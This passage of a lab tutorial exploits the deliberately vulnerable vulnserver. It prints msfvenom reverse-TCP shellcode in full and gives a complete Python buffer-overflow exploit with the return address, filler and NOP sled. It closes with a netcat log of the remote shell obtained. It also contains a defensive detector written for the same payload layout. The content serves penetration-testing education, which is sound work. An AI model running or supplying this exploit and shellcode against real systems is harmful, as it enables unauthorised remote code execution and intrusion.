7. Generate a reverse shell payload with Metasploit's msfvenom and append it to the exploit buffer without overflowing it (continued)
Let's get back to our Kali box. We use msfvenom to generate a reverse TCP shell that connects back to our machine.
If you are curious, msfvenom -l payloads lists every available payload (filtered here to the Windows ones):
root@kali:~/Desktop/exploits# msfvenom -l payloads | grep windows
cmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
...
root@kali:~/Desktop/exploits# msfvenom --list f
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
Let's generate the windows/shell_reverse_tcp payload:
root@kali:~/Desktop/exploits# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54"
"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3"
"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51"
"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4"
"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65"
"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e"
"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0"
"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8"
"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab"
"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c"
"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b"
"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35"
"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4"
"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d"
"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e"
"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99"
"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56"
"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0"
"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15"
"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f"
"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7"
"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37"
"\xda\xbd\xcc\xe4\xdb\x97";
The options that matter here:
-f c: output the payload as a C byte array (unsigned char buf[]) so it can be pasted into our script
EXITFUNC=thread: when the shell exits, only the thread running the payload terminates, so the vulnserver process keeps running instead of crashing
-b "\x00": tell the encoder to avoid the bad character \x00 in the generated bytes
Let's import this payload into our script.
exploit.py
import socket, sys


def probe(message):
    """
    Send one request to the vulnserver instance and print the response.
    :param message: request message (bytes)
    :return: void
    """
    host = "192.168.56.102"
    port = 9999
    res = None
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((host, port))
        my_socket.settimeout(10)  # add this to prevent the connection from hanging
        my_socket.recv(2048).decode()  # read the welcome banner
        my_socket.send(message)
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        my_socket.close()
        # hide the success, look for failure: we need the crash, we need the failure.
        print("[success] %s:%s %s => %s" % (host, port, message, res))
    except:
        # print the length instead of the message while testing the overflow length
        print("[error] %s:%s %s => None" % (host, port, len(message)))
        raise
        # sys.exit()


def main():
    # memory address 625011af (the JMP ESP found earlier), written little-endian
    # shell = '\x62\x50\x11\xaf'
    shell = b"\xaf\x11\x50\x62"
    # the reverse shell generated by msfvenom above
    msf = b"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4" + \
          b"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54" + \
          b"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3" + \
          b"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51" + \
          b"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4" + \
          b"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65" + \
          b"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e" + \
          b"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0" + \
          b"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8" + \
          b"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab" + \
          b"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c" + \
          b"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b" + \
          b"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35" + \
          b"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4" + \
          b"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d" + \
          b"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e" + \
          b"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99" + \
          b"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56" + \
          b"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0" + \
          b"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15" + \
          b"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f" + \
          b"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7" + \
          b"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37" + \
          b"\xda\xbd\xcc\xe4\xdb\x97"
    # shell = b"BBBB"
    # 2006 bytes of filler reach the saved return address; the 16 NOPs separate
    # the address from the shellcode
    payload = b"TRUN ." + b"A" * 2006 + shell + b"\x90" * 16 + msf
    # print(payload)
    probe(payload)
    print("completed test")


if __name__ == "__main__":
    main()
Before injecting our shell, we add a few \x90 NOPs between the return address and the shellcode, so that the first bytes of the payload are not corrupted when execution lands on the stack.
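From the defender's side, the payload layout just described (oversized TRUN argument, a long run of one filler byte, a NOP sled, then a tail of non-printable bytes with no \x00 in it because of -b "\x00") is exactly what a network sensor or log check can key on. The following is an added example, not code from the original walkthrough or from vulnserver: the function name, the thresholds and the sample requests are all constructed here, and the crafted sample keeps the page's shape but replaces the shellcode with an opaque run of bytes.

```python
import re
import string

# Constructed thresholds for this example (not values reported by any tool on the
# page). vulnserver's commands are short text, so a TRUN argument anywhere near the
# 2006-byte offset used in the walkthrough is far outside normal traffic.
MAX_SANE_TRUN_ARG = 1024   # bytes
MIN_NOP_SLED = 8           # consecutive 0x90 bytes
MIN_FILLER_RUN = 256       # consecutive copies of one byte

PRINTABLE = set(string.printable.encode())


def inspect_trun_request(data: bytes) -> dict:
    """Inspect one vulnserver request line and report overflow indicators.

    The indicators mirror the payload layout built in the walkthrough: a long
    filler run that reaches the saved return address, a sled of 0x90 NOPs, and
    a tail of non-printable bytes (the encoded shellcode, which contains no
    0x00 because msfvenom was told to avoid it with -b "\\x00").
    """
    command = data.split(b" ", 1)[0].decode("ascii", "replace")
    findings = []
    if command != "TRUN":
        return {"command": command, "suspicious": False, "findings": findings}

    arg = data[len(b"TRUN "):].rstrip(b"\r\n")
    if len(arg) > MAX_SANE_TRUN_ARG:
        findings.append("argument length %d exceeds %d" % (len(arg), MAX_SANE_TRUN_ARG))

    # one byte repeated hundreds of times is the offset filler ("A" * 2006 above)
    filler = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), arg, re.S)
    if filler:
        findings.append("run of %d repeated %r bytes (offset filler)"
                        % (len(filler.group()), filler.group()[:1]))

    # a run of 0x90 is the NOP sled placed between the address and the shellcode
    sled = re.search(rb"\x90{%d,}" % MIN_NOP_SLED, arg)
    if sled:
        findings.append("NOP sled of %d bytes at offset %d" % (len(sled.group()), sled.start()))

    # vulnserver speaks plain text, so any non-printable byte is out of place
    nonprint = sum(1 for b in arg if b not in PRINTABLE)
    if nonprint:
        findings.append("%d non-printable bytes in a text protocol" % nonprint)

    return {"command": command, "suspicious": bool(findings), "findings": findings}


# Constructed samples. CRAFTED has the same shape as the walkthrough's payload but the
# shellcode is replaced by an opaque run of the bytes 0x01..0xc7; it is not the page's payload.
BENIGN = b"TRUN .hello\r\n"
OTHER = b"STATS ok\r\n"
CRAFTED = (b"TRUN ." + b"A" * 2006 + b"\xaf\x11\x50\x62"   # filler + little-endian address
           + b"\x90" * 16 + bytes(range(1, 200)))          # NOP sled + opaque tail


if __name__ == "__main__":
    for sample in (BENIGN, OTHER, CRAFTED):
        report = inspect_trun_request(sample)
        print(report["command"], "suspicious" if report["suspicious"] else "ok")
        for finding in report["findings"]:
            print("   -", finding)
```

Each indicator on its own can occur in odd but legitimate traffic; the combination of all four in a single TRUN request is what makes the crafted sample stand out, and the reported offsets line up with the 2006-byte padding and the 16-byte sled used in the script above.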
Back on our Kali box, let's start the listener and then run the script:
root@kali:~/Desktop/exploits# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.102.
Ncat: Connection from 192.168.56.102:49602.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe
C:\Users\IEUser\Desktop\vulnserver>whoami
whoami
iewin7\ieuser
C:\Users\IEUser\Desktop\vulnserver>
Got it.
Exploited.